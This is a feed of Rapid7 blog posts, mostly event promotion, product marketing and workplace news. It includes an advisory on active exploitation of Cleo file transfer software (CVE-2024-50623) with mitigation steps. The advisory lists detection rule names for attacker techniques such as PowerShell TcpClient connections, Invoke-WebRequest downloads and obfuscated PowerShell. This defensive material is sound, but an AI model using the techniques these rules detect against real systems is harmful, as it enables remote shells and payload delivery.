All posts by Rapid7

Take Command | Rapid7’s 2025 Cybersecurity Summit: First Look at Our Speaker Lineup

Post Syndicated from Rapid7 original https://blog.rapid7.com/2025/02/19/take-command-rapid7s-2025-cybersecurity-summit-first-look-at-our-speaker-lineup/

Take Command | Rapid7’s 2025 Cybersecurity Summit: First Look at Our Speaker Lineup

Take Command Summit 2025 is shaping up to be one of the most impactful cybersecurity events of the year, bringing together Rapid7’s own security experts alongside leading industry voices for a full day of insights into today’s evolving attack landscape. This virtual summit will offer actionable strategies, real-world case studies, and expert discussions designed to help security teams take command of their defenses.

While we’ll be revealing the full agenda soon, we’re excited to share a first look at some of the key voices joining us this year to explore proactive risk management and offensive security strategies. These industry leaders will be part of a speaker lineup that includes Rapid7’s own security researchers, SOC experts, and product leaders, all focused on equipping security teams with the knowledge they need to outpace today’s adversaries.

Building a Modern Approach to Risk and Exposure Management

Tyler Shields, Industry Analyst at ESG, brings more than 25 years of experience in cybersecurity research, threat intelligence, and market strategy. As attack surfaces grow—spanning cloud, identity, data, and applications—security teams must shift from reactive to proactive risk management.

At Take Command 2025, he’ll explore how organizations can prioritize risk signals across diverse attack surfaces to build smarter, more proactive defense strategies. His session will provide a roadmap for understanding evolving threats and ensuring security teams focus on the most critical risks before they escalate.

Staying Ahead of Attackers with Continuous Red Teaming

Will Hunt, IT Consultant at In.Security, is a recognized expert in red teaming, penetration testing, and security training, having delivered workshops at Black Hat USA, Asia, and EU. As cyber threats evolve, static defenses and annual penetration tests are no longer enough—security teams need continuous testing strategies to stay ahead of adversaries.

At Take Command 2025, Hunt will join a panel of security experts to discuss how red teaming is evolving in response to expanding and increasingly complex attack surfaces and helping organisations stay ahead of adversaries. This session will explore how proactive testing is helping organizations identify and eliminate weaknesses before attackers can exploit them.

More to Come: A Full Day of Cybersecurity Insights

Take Command 2025 is more than just individual sessions—it’s a full day of expert discussions, deep technical insights, and strategic guidance from some of the best minds in cybersecurity. In addition to these featured speakers, Rapid7’s own security leaders, researchers, and SOC practitioners will provide critical perspectives on:

  • The evolving threat landscape and attacker mindset
  • How AI is redefining security operations and automation
  • Managing risk exposure across complex environments
  • Threat detection, response, and red teaming strategies

…and this is just the beginning! More speakers and sessions will be announced soon, covering the most pressing challenges facing security teams today.

Save Your Spot

Take Command Summit 2025 takes place on April 9, 2025, as a fully virtual, one-day event. Don’t miss the opportunity to hear from industry leaders, engage with Rapid7 experts, and walk away with actionable security strategies.

Register Now

Rapid7 Fills Gaps in the CVE Assessment Process with AI-Generated Vulnerability Scoring in Exposure Command

Post Syndicated from Rapid7 original https://blog.rapid7.com/2025/02/19/rapid7-fills-gaps-in-the-cve-assessment-process-with-ai-generated-vulnerability-scoring-in-exposure-command/

Rapid7 Fills Gaps in the CVE Assessment Process with AI-Generated Vulnerability Scoring in Exposure Command

The National Vulnerability Database (NVD) announced in February 2024 that it would no longer provide common vulnerability scoring system (CVSS) scores for all CVEs. Due to resource constraints and an inability to keep up with the volume of newly-disclosed vulnerabilities, NVD shifted its focus to processing vulnerabilities more efficiently by relying on vendor-provided and third-party scores rather than scoring each CVE independently.

Many organizations rely on NVD’s CVSS scores as a consistent, centralized guide to measuring the potential risk of vulnerabilities. This is especially useful for teams that don’t have the resources to conduct their own in-depth vulnerability analysis given the pace at which new CVEs are cropping up.

To address this widening gap in vulnerability scoring and ensure our customers are making informed decisions with the most accurate understanding of their current risk posture we’re excited to announce the release of AI-Generated Risk Scoring in Exposure Command. By integrating an advanced machine learning model, Exposure Command supplements existing CVSS scores by providing AI-Generated Risk Scores for CVEs where NVD does not provide them, ensuring all vulnerabilities are provided an accurate score.

The need to evolve from traditional vulnerability management practices to continuous threat and Exposure Management

Moving beyond simple risk scoring methodologies is critical for modern vulnerability management teams to stay ahead of advanced threats. For many organizations, this means adopting a Risk-Based Vulnerability Management (RBVM) approach.

Put simply, this means incorporating not just a deep and accurate understanding of how risky a given CVE is in a vacuum, but also layering on additional context related to reachability and exploitability, asset criticality, and a real-world understanding of what threat actors are actively targeting in the wild. And how all these inputs relate to the organization’s specific environment.

AI-Generated CVSS scoring in Exposure Command feeds directly into our broader Active Risk scoring methodology. More importantly, it empowers Rapid7 to produce predictive CVSS scores by analyzing vulnerability information and comparing with previous expert vulnerability analysis.

The model generates each vector individually, and once combined to form a score, results in 76% of these generated scores being in the correct severity classification. Combined with Rapid7’s Active Risk calculator, this increases to 87% of scores returning the correct classification. The remaining scores are never more than one classification out.

This insight will feed directly into and improve the overall accuracy of our Active Risk scoring models, as well as, ensure severity scores are assigned and provided to security teams faster than humanly possible, making your entire security program more resilient to external change.

By leveraging AI/ML to generate predictive risk scores, security teams benefit from:

  • Enhanced accuracy: Our expertly designed model trained on historical NVD data accurately provides CVSS scores.
  • Predictive scoring: Get immediate insight into the severity of newly-disclosed CVEs that are left unscored, without the need for manual aggregation and analysis.
  • Improved security posture: Ensuring all CVEs are assigned an accurate severity score, organizations are equipped with the necessary context to effectively prioritize remediation efforts and in turn strengthen their organization’s security posture.

This release represents a major step forward in our mission to provide industry-leading cybersecurity solutions. We expect these enhancements will significantly improve your ability to assess and manage vulnerabilities, giving you the confidence to stay ahead of potential threats.For more detailed information and implementation guidelines, please refer to the release notes. If you’d like to learn more about the Rapid7 AI Engine and how we’re leveraging AI across the platform, download the eBook today!

Interning at Rapid7 Prague: Meet Mko

Post Syndicated from Rapid7 original https://blog.rapid7.com/2025/02/10/interning-at-rapid7-prague-meet-mko/

Interning at Rapid7 Prague: Meet Mko

Mkrtich Hovsepyan – most people call him Mko –  is an intern at Rapid7’s fast-growing office in Prague. He graduated from the luminous Charles University in Prague, and is currently a first-year master’s student in Artificial Intelligence there. He was in our first impressive crop of interns, and is sharing his experience as we gear up for our next wave of intern hiring.

How would you summarize your internship with Rapid7?

My internship as a Data Engineering Intern at Rapid7 was an enriching experience where I learned about the processes and pipelines of how data is processed and later utilized for Business Analytics and other spheres. Many people think data engineering is just about knowing SQL, but for me, SQL was only a small part of the role. I worked on projects that . allowed me to develop my skills in creating ETL processes and other data workflows. Most importantly, I honed my soft skills, and it was easy to do so because the team and management were very supportive.

What advice would you give your past self before starting your internship?

My advice would be to communicate with as many people as possible. Since your team might be working from different parts of the globe, it can become a bit challenging to connect when you don’t have common lunches or in-person meetings. Rapid7 offers opportunities like Insight Coffees to meet different kinds of people and enhance communication. Also, a friendly tip: try not to merge PRs on a Friday!

What support have you been given while at Rapid7?

I really liked that I was seen as someone worth investing in for the future. This meant my team let me try things on my own, giving me the chance to succeed and also to fail sometimes (and yes, there were a few “interesting surprises” along the way!). They knew that making mistakes is one of the best ways to learn and get better. I’m thankful to my teammates who spent a lot of time explaining the basic processes to me.

What has been your favorite experience while at Rapid7?

We were celebrating the first anniversary of the Rapid7 office in Prague, and there was a fun challenge to gather nine signatures from nine different people. The interesting part was that each person had specific characteristics you had to find – like someone working in a specific team, someone with a sticker on their laptop, or even someone whose shoe size is a prime number! It was a great way to meet new colleagues across different teams.

How would you summarize the culture in 3 words?

Open-Minded, Innovative, Transparent.

At Rapid7, we’re working to create a secure digital world for our customers, our industry, and our communities. We give organizations command of their attack surface with the most adaptive, predictive, and responsive cybersecurity platform – and meaningful, impactful partnership.

The Rapid7 office in Prauge opened in October 2023, and has quickly grown to support all areas of our business. Learn more and browse our latest job openings here: https://careers.rapid7.com/rapid7-in-prague

Take Command | Rapid7’s 2025 Cybersecurity Summit: Own Your Attack Surface on April 9

Post Syndicated from Rapid7 original https://blog.rapid7.com/2025/02/05/take-command-rapid7s-2025-cybersecurity-summit/

Take Command | Rapid7’s 2025 Cybersecurity Summit: Own Your Attack Surface on April 9

Save the date: April 9, 2025

Take Command is back. After a hugely successful event last year, Rapid7’s cybersecurity summit returns with another stellar lineup to equip security teams with the latest threat intelligence, expert insights, and real-world strategies to take control of an evolving attack landscape.

At Take Command 2025, leading security experts, practitioners, and Rapid7’s own research teams will break down the latest attacker tactics, showcase cutting-edge defensive strategies, and explore how AI, MDR, and exposure management are reshaping cybersecurity. Taking command means shutting down threats before they can disrupt your business, staying ahead of adversaries, and constantly refining your defences—and that’s exactly what this year’s event is all about.

Why Attend?

Expert Research and Intelligence

Gain insights from Rapid7 Labs, the curators of Metasploit and our renowned open-source community. Learn how to safeguard against emerging ransomware threats, state-sponsored tactics, and critical vulnerabilities with cutting-edge research you can act on immediately.

Inside the SOC & Real-World Security Insights

Go inside Rapid7’s always-on SOC and hear how security leaders are tackling attack detection, response, and board-level expectations. Learn from peers and industry experts about managing today’s cybersecurity challenges.

Take Command of Your Attack Surface

Discover how MDR, AI, and exposure management can help you proactively reduce risk and outpace attackers. Eliminate silos, enhance visibility, and take decisive action to secure your organization.

What’s on the Agenda?

Building on last year’s high-impact sessions—including “Ready and Resilient: Before, During, & After Ransomware Attacks” and “Control the Chaos: Building Resilient Cyber Defenses Through AI”—Take Command 2025 will deliver even more insights into today’s most urgent cybersecurity challenges.

This year’s event will focus on:

  • The evolving threat landscape – Understanding adversaries’ latest techniques and how to stay ahead
  • AI and security automation – How AI is transforming detection, response, and cyber resilience
  • Cloud security and MDR – Strengthening defences in modern, hybrid environments
  • Proactive risk and exposure management – Strategies to continuously assess and reduce attack surface risk
  • Security operations in action – Expert insights on threat hunting, red teaming, and real-world SOC strategies

Mark Your Calendar & Save Your Spot

Take Command Summit 2025 takes place on April 9, 2025. This one-day virtual event is completely free and designed to give security professionals the insights they need to stay ahead of attackers.

[Save your spot now]

To see what you missed last year, watch 2024’s sessions here.

Excellence in Leadership: CRN Recognizes Alex Page Among Its 2025 Channel Chiefs

Post Syndicated from Rapid7 original https://blog.rapid7.com/2025/02/03/excellence-in-leadership-crn-recognizes-alex-page-among-its-2025-channel-chiefs/

Excellence in Leadership: CRN Recognizes Alex Page Among Its 2025 Channel Chiefs

For the third consecutive year, Rapid7’s Alex Page has been honored as a CRN Channel Chief, a testament to his unwavering commitment to driving growth, fostering innovation, and strengthening our global channel partnerships. CRN’s annual Channel Chiefs list showcases the top leaders throughout the IT channel ecosystem who go above and beyond to ensure mutual success with their partners and customers. This recognition highlights Alex’s remarkable leadership as well as the significant strides his team has made in collaboration with Rapid7’s channel ecosystem.

A philosophy that drives success

Alex’s channel philosophy is simple, yet powerful: Focus matters. By identifying and investing in the partners who best align with Rapid7’s goals and have the ability to deliver exceptional customer success, Alex and his team ensure a meaningful and impactful collaboration. This focused approach has not only delivered outstanding mutual results, it has also deepened the appreciation and trust we share with our partners.

Innovating for the future

An example of an impactful initiative led by Alex and his team in 2024 was Rapid7’s partnership with Comcast. This collaboration combines the advanced SecOps technology of Rapid7’s Command Platform with 24/7 SOC capabilities to provide superior threat detection and prevention for Comcast’s small, medium, and large enterprise customers. Through this innovative partnership, we have expanded our partner ecosystem as well as set a new standard for delivering world-class security solutions.

Looking ahead to 2025

As the channel landscape evolves, Alex and his team — supported by the greater Rapid7 organization — are doubling down on three key areas in 2025:

  1. Relationship focused approach – By focusing on the partners who will solve our customers’ problems, and forming deep relationships with each of them, rather than aiming for a breadth of partners with shallow connections, we will jointly acquire more customers and enable their long-term success.
  2. A unified partner experience – Many of Rapid7’s partners don’t fit cleanly into a single bucket. They’re not just a channel partner or just a service provider; they are many things to their customers. In 2025 and beyond, partners will be able to engage with Rapid7 and their customers in a variety of ways.
  3. Technical enablement and specialization – Partners are making it clear that they need to empower their technical resources more than ever before to meet the evolving security needs of their customers. By prioritizing technical enablement and helping our partners specialize in the many capabilities where Rapid7 technologies lead the market, we will ultimately drive even higher rates of customer satisfaction together, which leads to positive business outcomes for the customer, the partner, and Rapid7.

Shared growth through collaboration

Learn more about sales, technology, and partnerships with Rapid7 by visiting our Partners page.

Paying It Forward: Giving and Receiving Mentorship in Tech

Post Syndicated from Rapid7 original https://blog.rapid7.com/2025/01/30/paying-it-forward-giving-and-receiving-mentorship-in-tech/

Paying It Forward: Giving and Receiving Mentorship in Tech

I’ve never actually seen the 2000 romantic drama Pay It Forward, but the movie’s core idea has stayed with me since I first heard of it:

The best way to repay a favor or good deed is to do one for someone else. You ‘pay it forward,’ and ask that person to do likewise, creating an expanding web of positivity and goodwill.

Cliche as it may sound, it’s served me well over my career. I’ve had many roles over the past 20 years, starting as a junior engineer  and progressing into management. My own mentors and coaches shaped my experiences along the way, contributing to that growth.

In return, I try to do the same for others.

Mentorship vs. coaching

I want to briefly look at ‘mentorship’ versus ‘coaching,’ as they are often conflated. There is certainly overlap, but the approach and impetus differs.

Mentorship involves dedicated guidance and support over time. The mentee drives the relationship, the ultimate goal, and the current focus. The mentor maps a path to the goal, and offers personalized knowledge and experience on a one-to-one basis.

Coaching is a more structured approach,primarily driven by the coach. It normally involves specific skill or knowledge training, and often isn’t personalized; it can be extended to groups with minimal change.

I believe that successful learning relationships operate on a spectrum between mentorship and coaching. Particularly in tech, where so-called ‘hard’ and ‘soft’ skills carry equal weight, the focus is a sliding scale over time.

For this article, I’ll focus on the ‘mentor’ and ‘mentee’ roles for simplicity.

Why do people seek mentorship?

Mentee-mentor relationships are inherently transactional – and that’s okay! The mentee has a goal to achieve, and wants help to get there. So what’s in it for both parties?

For mentees, it’s fairly obvious:

  • Skills and experience growth
  • Career advancement
  • Increased profile and exposure
  • Personalized individual guidance

The mentor – wanting to be diligent and accurate with their guidance – sees their own skills and knowledge reinforced. Communication and teaching skills grow. Their ability to elevate others is advantageous for their own career aspirations.

It’s okay to feel good about this – it’s a good thing.

Mentorship and career growth

As you climb the ladder in your career, you will find yourself gaining:

  • The ability to handle increasing ambiguity, complexity, and scope
  • Knowledge and experience you can share with others

Obviously you also have to deliver value, but I see that as a function of the above, plus institutional factors. Your increasing capacity to navigate complex or ambiguous environments, paired with an advanced set of skills, is what propels you from  wide-eyed junior to seasoned veteran.

We’re all walking this path in some form. Juniors often need direction on what to do and how to do it. With more experience, there is less direction needed for ‘how’ and more focus on ‘what’ and ‘why.’ You start to own features and systems, and can guide others.

In higher roles, strategy comes to the forefront as you become more aware of business needs, customer requirements, and wider technical challenges. You’ve gone from ‘change this line of code’ to ‘increase this KPI by 20%’. Ambiguity, complexity, and scope all go up as a result..

In addition to changes in your deliverables, success also becomes measured by how well you can elevate others around you. At Rapid7, we look at leaders to be impact multipliers, meaning they have the capacity to drive impact not only in their own roles, but how they support those around them to be successful.

Additionally, you don’t have to wait to be in an official people leader role to have this kind of impact. Being a mentor and elevating others can happen regardless of where you are in your career journey.

Mentoring someone is an investment in the future. You chart a path to success, act as a role model, and in some ways shape the industry to come.

Getting started

Whether you’re looking to become a mentor – or seeking guidance as a mentee – the keys to getting started are relatively similar.

Seeking the right opportunities

  • Take stock of where you have existing relationships to build off of, and ask for guidance while sharing what your goals are for entering into a mentorship relationship. – Let your colleagues and manager know that you’re available. Sharing your goals with your manager can help incorporate your mentor experience into your personal development plan, and they may even have recommendations on how to get started. Colleagues can be great mentors/mentees, and may also be able to help point you in the right direction to connect with someone. Seek opportunities on Slack, Discord, and other community channels. Going beyond your current employer can expose you to different practices and philosophies that exist within the same field or area of focus.
  • Attend meetups and conferences to network and find opportunities. The goal of attending an event is often to gain knowledge and share best practices, so this is a great audience for you to find your mentor/mentee match.

Establishing guidelines and expectations

It’s important for both parties to agree on some foundational principles, which for me are:

  • Mutual trust and respect
  • Adequate investment of time, effort, and care
  • Fluidity and flexibility
  • Transparency, honesty, and accountability

Maintaining effective mentorships

Let’s look at some other factors to consider and watch for as the relationship evolves:

  • Don’t over-prescribe structure or get bogged down in note-taking – keep it light and fluid to encourage maximum flexibility.
  • There are no ‘stupid questions’ – don’t apologize as a mentee for asking!
  • Leave ego at the door – embrace honest feedback and mutual respect at all times.
  • Safety and trust are essential – but avoid getting too personal in ways that hinder your ability to be honest and open.
  • Mentorship is a vital tool for managers – but transparency can suffer when the mentee is also a direct report. Peer relationships without these power structures can feel ‘safer’ and encourage better transparency.

Conclusion

When it comes to mentorship, my core point is this:

Helping people is good, and you can (and should) do it.

As a mentor, you have the opportunity to shape someone’s career and experience while galvanizing your own skills and future prospects. Start today, in whatever form you can.

As a mentee benefitting from guidance and support in pursuit of your goals, try not to forget to pay it forward. Find someone to guide and help on their journey, as you yourself have been.

Built In Honors Rapid7 with “2025 Best Places To Work” Award

Post Syndicated from Rapid7 original https://blog.rapid7.com/2025/01/09/built-in-honors-rapid7-with-2025-best-places-to-work-award/

3 Rapid7 Offices Included in Built In’s “Best Places to Work” Lists

Built In Honors Rapid7 with “2025 Best Places To Work” Award

Built In has announced that Rapid7 is being honored in the 2025 Best Places To Work Awards. Specifically, Rapid7 earned recognition for three office locations: Austin, Boston, and Arlington (Washington DC). The annual awards program includes companies of all sizes, from startups to those in the enterprise, and honors both remote-first employers as well as companies in large tech markets across the U.S.

“When employees join Rapid7, they quickly see how much we care for our people and their experience with us. Through competitive compensation packages, inclusive benefits, and a variety of location specific perks and amenities, we’re committed to ensuring our people are supported in doing their most impactful and creative work.” says Christina Luconi, Chief People Officer at Rapid7.

Lists where Rapid7 offices were featured include:

  • 100 Best Large Places to Work Austin
  • 100 Best Large Places to Work Boston
  • 100 Best Large Places to Work Washington DC (for our Arlington office)
  • 100 Best Places to Work (all sizes) Washington DC (for our Arlington office)

Built In determines the winners of Best Places to Work using company data about compensation and benefits. To reflect the benefits candidates are searching for more frequently on Built In, the program also weighs criteria like remote and flexible work opportunities, programs for DEI and other people-first cultural offerings.  

“Being recognized as a Best Place to Work is a testament to these companies’ commitment to building a workplace where individuals and innovation thrive,” says Built In CEO and Founder, Maria Christopoulos Katris. “At Built In, we understand that great companies are powered by great teams, and this achievement showcases their dedication to fostering a culture of growth, inclusivity, and excellence. Congratulations on this well-deserved honor.”

Rapid7 believes that when it comes to creating an exceptional workplace, winning an award doesn’t mean the job is done. Our Workplace Experience and People Strategy teams embrace our core value of ‘Never Done’ by evaluating and evolving our offerings, so our people can build the career experience of a lifetime. Awards like these are one of many components we leverage to ensure we are on the right track, and we look forward to the continued evolution of our workplaces in 2025 and beyond.

Want to learn more about working at Rapid7? Click here for our careers site.

Rapid7 Recognized with Top Score of 100 in 2025 Corporate Equality Index

Post Syndicated from Rapid7 original https://blog.rapid7.com/2025/01/07/rapid7-recognized-with-top-score-of-100-in-2025-corporate-equality-index/

Rapid7 Recognized with Top Score of 100 in 2025 Corporate Equality Index

On January 7, the Human Rights Campaign Foundation released their 2025 Corporate Equality Index (CEI), where Rapid7 earned a top score of 100.

The CEI is the nation’s leading benchmark for LGBTQ+ workforce equality, evaluating policies and practices in areas such as non-discrimination, equitable benefits, inclusive cultures, and corporate social responsibility. With this score, Rapid7 is recognized as a leader in LGBTQ+ Workplace Inclusion.

This recognition reflects Rapid7’s core value; and our commitment to creating a dynamic workplace where all people can build a rewarding career. Our core value  ‘Bring You’ is an invitation for everyone to embrace their uniqueness and bring their true selves to the workplace. We know that fostering a culture of inclusion enables people to be more creative and generate innovative ideas – essential skills when working in the field of cybersecurity. Additionally, we recognize that our work in this space is truly ‘Never Done’. We continuously evaluate, optimize, and seek feedback on programs and practices that support diversity, equity, and inclusion across the business. We’re proud of this recognition, and will continue to work towards building and maintaining a workplace where all people have access to the tools, resources, and communities that enable them to feel seen and valued, so they can make an incredible impact through their work.

In consideration for this recognition, the CEI examined Rapid7’s practices and policies against four core pillars:

• Non-discrimination policies across business entities

• Equitable benefits for LGBTQ+ workers and their families

• Supporting an inclusive culture; and,

• Corporate social responsibility

“HRC Equality Index recognition reflects a gold standard, one that ensures employees—regardless of their lived experience—have equitable access to benefits and are treated inclusively. We alignwith the HRC Equality Index standard, as we believe it fosters an environment that enables employees to bring their authentic selves to work. By cultivating an environment that nutures this dynamic, we empower our people to perform at their best and contribute meaningfully to the success of our business.

Additionally, achieving recognition on the HRC Equality Index underscores our broader commitment to being an employer who strives to reflect the global community we seek to secure. This milestone also highlights how essential equity is to our mission. Equity is a key part of the equation, and it is vital that we never lose sight of its importance.

I am incredibly proud that we are included on the index this year. This achievement reflects our ongoing commitment to fostering innovation, belonging, and excellence in all that we do.”

In addition to offering equitable benefits, Rapid7’s employee resource groups provide opportunities for people to come together around shared experiences. The Pride community provides space for LGBTQ+ employees and their allies to raise visibility and provide support through various virtual and in-office events. These initiatives include hosting external speakers, facilitating open discussions, and organizing celebrations.

To learn more about Rapid7 as a workplace, visit our careers page today.

Navigating Choppy Waters: Top Security Predictions from Rapid7’s 2025 Webinar

Post Syndicated from Rapid7 original https://blog.rapid7.com/2024/12/12/navigating-choppy-waters-top-security-predictions-from-rapid7s-2025-webinar/

Navigating Choppy Waters: Top Security Predictions from Rapid7's 2025 Webinar

It’s that time of year again — one year is ending and another is set to begin.. And what a year it’s been for the security community! The sheer scale of incidents has left SecOps teams breathless, so thinking about what could be in store next year can be overwhelming.

But there’s no need to panic; despite the disruption, the community has rallied together and risen to the challenge, demonstrating adaptability, collaboration, and resilience. And, most of all, why this industry isn’t for the faint of heart!

Over the last few years, we’ve seen significant interest in our annual Security Predictions webinar. Security teams use the session to take stock of the current year and use the predictions to get a head start on planning for the next.

This year, the webinar was shot in person from Rapid7’s office in Belfast, a city that has emerged as a modern tech innovation hub. From its origins as the shipyards that birthed the Titanic, Belfast’s history is a testament to both ambition and resilience, so it is fitting that this city served as the stage for Rapid7’s annual Security Predictions webinar.

Hosted by industry heavy hitter Brian Honan, CEO of BH Consulting, the webinar brought together Rapid7 security and policy experts Raj Samani, Chief Scientist, and Sabeen Malik, VP of Global Government Affairs and Public Policy.

Looking Back: 2024’s Predictions in Review

Before diving into the future, the panel revisited their predictions for 2024, which focused on three core areas:

1. Increasing risks and regulations will intensify pressure on businesses to navigate evolving demands across a complex global landscape.

Sabeen Malik highlighted that the forecasted rise in cyber regulations materialized, with frameworks like NIS2 and the SEC’s cybersecurity mandates intensifying global compliance demands.

2. Expect a surge in the growth of real-time information sharing within global public-private cyber partnerships.

While strides were made, Raj Samani noted that much of the shared data lacks actionable context, calling for enriched, actionable intelligence that organizations can immediately act upon.

3. The continued use of zero-day vulnerabilities exploited by ransomware groups will compel SOCs to focus on exposure management and validation strategies.

As predicted, ransomware groups continued to exploit zero-day vulnerabilities, a trend exacerbated by their increasing sophistication and access to novel attack vectors.

“2024 was pretty much on the button,” said Brian Honan. “The predictions were accurate, but the challenges they highlighted are far from over.”

2025 could be Iceberg Alley/Visibility as a Life Preserver

Prediction 1: Greater visibility will act as a life preserver for security teams treading water across an increasingly complex attack surface.

Visibility isn’t just a cybersecurity buzzword—it’s the foundation of effective defense. Raj Samani summarized this challenge succinctly: “You can’t protect what you don’t know about.”

In today’s environment, where assets span on-premise systems, cloud services, and third-party integrations, organizations often need help to map their full attack surface. Raj explained how conflicting data from multiple tools complicates this task: “Your endpoint provider says one thing, your VPN provider says another — how do you normalize this information?”

After further discussion, the panellists provided a short, medium and long-term action plan to help defenders strengthen their visibility.

Prediction 2: To thrive in a world where regulatory change is an ongoing concern, SecOps should prepare for both the predictable and the unpredictable.

In cybersecurity, the only constant is change. The panel emphasized the need for agile Security Operations Centers (SOCs) to respond effectively to both expected and unexpected threats.

“This is about moving beyond checkbox exercises,” said Sabeen. “SOC teams must adopt continuous processes and infrastructure to manage a rapidly changing landscape.” She pointed to regulatory frameworks like DORA and NIS2, which mandate real-time monitoring and frequent vulnerability assessments, as drivers of this shift.

The panelists also provided an action plan that prioritizes incident response, real-time threat detection, and continuous vulnerability management to meet evolving compliance and security needs.

Prediction 3: Cybercriminals will increasingly exploit zero-day vulnerabilities, expanding potential entry points and bypassing traditional security measures to deliver more ransomware attacks.

Ransomware remains a dominant threat, evolving as attackers adopt zero-day vulnerabilities to bypass traditional defenses. Raj explained how this shift is lowering the technical barriers for cybercriminals: “Access to zero-days allows even unsophisticated actors to execute devastating attacks.”

The professionalization of ransomware groups further exacerbates the threat. As Sabeen noted, “This is no longer a scattered effort. It’s a highly organized, professional ecosystem, and it’s growing at an unsustainable rate.”

The team outlined an action plan to combat ransomware, including the critical action step of engaging organizational leadership to prioritize cybersecurity investments and ensure board-level awareness of the risks.

“Use this as an opportunity to have meaningful discussions with your board,” Raj advised. “Ransomware is a top concern, and preparation is key.”

Final Thoughts: Staying Resilient in Choppy Waters

While the challenges of 2025 may seem daunting, the panel concluded on a hopeful note. Raj highlighted Rapid7’s commitment to empowering the industry through open-source tools and resources like AttackerKB, Metasploit, and Velociraptor.

“Don’t be overwhelmed,” Raj said. “We’re all in this together, and Rapid7 is here to help with actionable insights and tools that protect what matters most.”

As Brian wrapped up, he reflected on Belfast’s legacy and the lessons it offers. “The Titanic reminds us of both the heights of ambition and the importance of preparation. In cybersecurity, as in life, visibility, adaptability, and resilience are the keys to navigating choppy waters.”

To get a full understanding of what 2025 could bring, watch the Top Cybersecurity Predictions webinar on-demand.

Widespread exploitation of Cleo file transfer software (CVE-2024-50623)

Post Syndicated from Rapid7 original https://blog.rapid7.com/2024/12/10/etr-widespread-exploitation-of-cleo-file-transfer-software-cve-2024-50623/

Widespread exploitation of Cleo file transfer software (CVE-2024-50623)

On Monday, December 9, multiple security firms began privately circulating reports of in-the-wild exploitation targeting Cleo file transfer software. Late the evening of December 9, security firm Huntress published a blog on active exploitation of three different Cleo products (docs):

  • Cleo VLTrader, a server-side solution for “mid-enterprise organizations”
  • Cleo Harmony, which provides file transfer capabilities for “large enterprises”
  • Cleo LexiCom, a desktop-based client for communication with major trading networks  

Huntress’s blog says the exploitation they’re seeing across Cleo products results from an insufficient patch for CVE-2024-50623, a vulnerability disclosed in Cleo VLTrader, Cleo Harmony, and Cleo LexiCom in October 2024. Cleo indicated that the vulnerability was fixed in version 5.8.0.21 of all three solutions, but according to Huntress, 5.8.0.21 remains vulnerable to exploitation. CVE-2024-50623 is a cross-site scripting issue (CWE-79) that allows for unauthenticated remote code execution on target systems.

Update: Cleo evidently communicated with customers on December 10 acknowledging a “critical vulnerability in Cleo Harmony, VLTrader, and LexiCom that could allow an unauthenticated user to import and execute arbitrary bash or PowerShell commands on the host system by leveraging the default settings of the Autorun directory.”

As of December 10, Rapid7 MDR has confirmed successful exploitation of this issue in customer environments; similar to Huntress, our team has observed enumeration and post-exploitation activity and is investigating multiple incidents.

File transfer software continues to be a target for adversaries, and for financially motivated threat actors in particular. Rapid7 recommends taking emergency action to mitigate risk related to this threat.

Mitigation guidance

The following products and versions are vulnerable to CVE-2024-50623. The information below contradicts previous vendor guidance, which indicated that 5.8.0.21 resolved the issue. Cleo has updated their advisory as of December 10, 2024 to confirm 5.8.0.21 is still vulnerable.

  • Cleo Harmony before and including version 5.8.0.21
  • Cleo VLTrader before and including version 5.8.0.21
  • Cleo LexiCom before and including version 5.8.0.21

According to Huntress, “Cleo is preparing a new CVE designation and expects a new patch to be released mid-week.”

In the absence of an effective patch for CVE-2024-50623 (and any other CVEs that may be assigned to this exploit), Cleo customers should remove affected products from the public internet, ensuring they are behind a firewall. Per Huntress’s investigation, disabling Cleo’s Autorun Directory, which allows command files to be automatically processed, may also prevent the latter part of the attack chain from being executed.

Huntress’s blog has several descriptions of post-exploitation activity, including attack chain artifacts, commands run, and files dropped for persistence. Rapid7 recommends that affected customers review these indicators and investigate their environments for suspicious activity dating back to at least December 3, 2024.

Rapid7 customers

InsightVM and Nexpose customers will be able to assess their exposure to CVE-2024-50623 on Windows with an authenticated vulnerability check expected to be available in today’s (Tuesday, December 10) content release. Please note that content releases are typically available late in the evening ET on Patch Tuesday.

InsightIDR and Managed Detection and Response customers have existing detection coverage through Rapid7’s expansive library of detection rules. Rapid7 recommends installing the Insight Agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage. Below is a non-exhaustive list of rules deployed and alerting on behavior related to this threat:

  • Suspicious Process – XORed Data in PowerShell
  • Suspicious Process – PowerShell System.Net.Sockets.TcpClient
  • Attacker Behavior – Possible Cleo MFT Exploitation 2024
  • Attacker Tool – PowerShell -noni -ep -nop Flags
  • Attacker Behavior – Obfuscated Powershell Script Containing -noni -ep -nop Flags
  • Suspicious Process – Powershell Invoke-WebRequest

Expanded SOC Coverage Into AWS Environments with Rapid7 MXDR

Post Syndicated from Rapid7 original https://blog.rapid7.com/2024/12/03/expanded-soc-coverage-into-aws-environments-with-rapid7-mxdr/

Co-athored by Mikayla Wyman and Ryan Blanchard

Expanded SOC Coverage Into AWS Environments with Rapid7 MXDR

As organizations increasingly rely on AWS for scalability and innovation, the complexity of securing these environments grows. AWS offers a robust set of native services and a comprehensive ecosystem, but managing security signals and responding to threats across dynamic workloads can overwhelm even the most well-equipped teams.

Rapid7’s Managed Extended Detection and Response (MXDR) service has focused on helping customers bridge this gap, unifying security telemetry from major cloud service providers including AWS and Azure, with expert-driven detection and response. With MXDR, organizations can confidently scale their cloud investments without sacrificing the comprehensive coverage they’re familiar with today.

Tailored to AWS Workloads and Modern Cloud Security Challenges

MXDR delivers the context and coverage needed to handle complex threats in AWS environments, providing a purpose-built service to address the specific challenges of securing modern cloud environments. With the extension of MXDR for AWS, teams can tailor their Rapid7 MXDR support to include triage, investigation, and response for critical GuardDuty alerts directly within their MDR service.

Layering native AWS telemetry with insights from other tools and environments creates a centralized, unified view of your security posture. With this context, our team is able to tailor protections and actions to the unique needs of your environment, safeguarding your assets more effectively against evolving threats. This comprehensive perspective empowers Rapid7 MDR analysts to operate at peak efficiency, ensuring your organization experiences a robust incident response lifecycle, from initial detection and alert triage to containment and response.

Augmenting Your Security Team with a Fleet of CDR Experts

Protecting your AWS environment doesn’t need to be a solo effort. With Rapid7 MXDR, you gain access to our extensive team of seasoned MDR analysts who diligently monitor, triage, and respond to incidents in real time, reducing operational burden. With an expert MDR team on call, teams are ready to contain incidents and limit blast radius. Customized mitigation and response strategies for AWS workloads, aligned with your unique environment and risk tolerance enables our team to provide clear insights, remediation guidance and future mitigation recommendations to improve security and drive executive buy-in for security investments.

